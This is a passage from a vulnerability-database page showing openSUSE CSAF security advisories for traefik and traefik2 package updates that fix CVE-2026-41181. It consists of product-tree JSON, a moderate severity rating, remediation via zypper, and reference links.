                  "name": "traefik-3.6.16-1.1.s390x",
                  "product_id": "traefik-3.6.16-1.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "traefik-3.6.16-1.1.x86_64",
                "product": {
                  "name": "traefik-3.6.16-1.1.x86_64",
                  "product_id": "traefik-3.6.16-1.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "traefik-3.6.16-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:traefik-3.6.16-1.1.aarch64"
        },
        "product_reference": "traefik-3.6.16-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "traefik-3.6.16-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:traefik-3.6.16-1.1.ppc64le"
        },
        "product_reference": "traefik-3.6.16-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "traefik-3.6.16-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:traefik-3.6.16-1.1.s390x"
        },
        "product_reference": "traefik-3.6.16-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "traefik-3.6.16-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:traefik-3.6.16-1.1.x86_64"
        },
        "product_reference": "traefik-3.6.16-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2026-41181",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-41181"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "unknown",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:traefik-3.6.16-1.1.aarch64",
          "openSUSE Tumbleweed:traefik-3.6.16-1.1.ppc64le",
          "openSUSE Tumbleweed:traefik-3.6.16-1.1.s390x",
          "openSUSE Tumbleweed:traefik-3.6.16-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-41181",
          "url": "https://www.suse.com/security/cve/CVE-2026-41181"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:traefik-3.6.16-1.1.aarch64",
            "openSUSE Tumbleweed:traefik-3.6.16-1.1.ppc64le",
            "openSUSE Tumbleweed:traefik-3.6.16-1.1.s390x",
            "openSUSE Tumbleweed:traefik-3.6.16-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-05-06T00:00:00Z",
          "details": "moderate"
        }
      ],
      "title": "CVE-2026-41181"
    }
  ]
}

OPENSUSE-SU-2026:10714-1

Vulnerability from csaf_opensuse - Published: 2026-05-06 00:00 - Updated: 2026-05-06 00:00

Summary

traefik2-2.11.45-1.1 on GA media

Severity

Moderate

Notes

Title of the patch: traefik2-2.11.45-1.1 on GA media

Description of the patch: These are all security issues fixed in the traefik2-2.11.45-1.1 package on the GA media of openSUSE Tumbleweed.

Patchnames: openSUSE-Tumbleweed-2026-10714

CVE-2026-41181

Affected products

Recommended 4 products

Product	Version	Remediation
Unresolved product id: openSUSE Tumbleweed:traefik2-2.11.45-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:traefik2-2.11.45-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:traefik2-2.11.45-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:traefik2-2.11.45-1.1.x86_64	—	Vendor Fix

Threats

Impact moderate

References

4 references

URL	Category
https://www.suse.com/support/security/rating/	external
https://ftp.suse.com/pub/projects/security/csaf/o…	self
https://www.suse.com/security/cve/CVE-2026-41181/	self
https://www.suse.com/security/cve/CVE-2026-41181	external

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "traefik2-2.11.45-1.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the traefik2-2.11.45-1.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2026-10714",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10714-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-41181 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-41181/"
      }
    ],
    "title": "traefik2-2.11.45-1.1 on GA media",
    "tracking": {
      "current_release_date": "2026-05-06T00:00:00Z",
      "generator": {
        "date": "2026-05-06T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2026:10714-1",
      "initial_release_date": "2026-05-06T00:00:00Z",
      "revision_history": [
        {
          "date": "2026-05-06T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "traefik2-2.11.45-1.1.aarch64",
                "product": {
                  "name": "traefik2-2.11.45-1.1.aarch64",
                  "product_id": "traefik2-2.11.45-1.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "traefik2-2.11.45-1.1.ppc64le",
                "product": {
                  "name": "traefik2-2.11.45-1.1.ppc64le",
                  "product_id": "traefik2-2.11.45-1.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "traefik2-2.11.45-1.1.s390x",
                "product": {
                  "name": "traefik2-2.11.45-1.1.s390x",
                  "product_id": "traefik2-2.11.45-1.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "traefik2-2.11.45-1.1.x86_64",
                "product": {
                  "name": "traefik2-2.11.45-1.1.x86_64",
                  "product_id": "traefik2-2.11.45-1.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "traefik2-2.11.45-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:traefik2-2.11.45-1.1.aarch64"
        },
        "product_reference": "traefik2-2.11.45-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "traefik2-2.11.45-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:traefik2-2.11.45-1.1.ppc64le"
        },
        "product_reference": "traefik2-2.11.45-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "traefik2-2.11.45-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:traefik2-2.11.45-1.1.s390x"
        },
        "product_reference": "traefik2-2.11.45-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "traefik2-2.11.45-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:traefik2-2.11.45-1.1.x86_64"
        },
        "product_reference": "traefik2-2.11.45-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2026-41181",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-41181"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "unknown",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:traefik2-2.11.45-1.1.aarch64",
          "openSUSE Tumbleweed:traefik2-2.11.45-1.1.ppc64le",
          "openSUSE Tumbleweed:traefik2-2.11.45-1.1.s390x",
          "openSUSE Tumbleweed:traefik2-2.11.45-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-41181",
          "url": "https://www.suse.com/security/cve/CVE-2026-41181"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:traefik2-2.11.45-1.1.aarch64",
            "openSUSE Tumbleweed:traefik2-2.11.45-1.1.ppc64le",
            "openSUSE Tumbleweed:traefik2-2.11.45-1.1.s390x",
            "openSUSE Tumbleweed:traefik2-2.11.45-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-05-06T00:00:00Z",
          "details": "moderate"
        }
      ],
      "title": "CVE-2026-41181"
    }
  ]
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-41181 (GCVE-0-2026-41181)

CERTFR-2026-AVI-0531

Solutions

FKIE_CVE-2026-41181

GHSA-P6HG-QH38-555R

Summary

Patches

For more information

OPENSUSE-SU-2026:10713-1

OPENSUSE-SU-2026:10714-1

Tags

Sightings

Nomenclature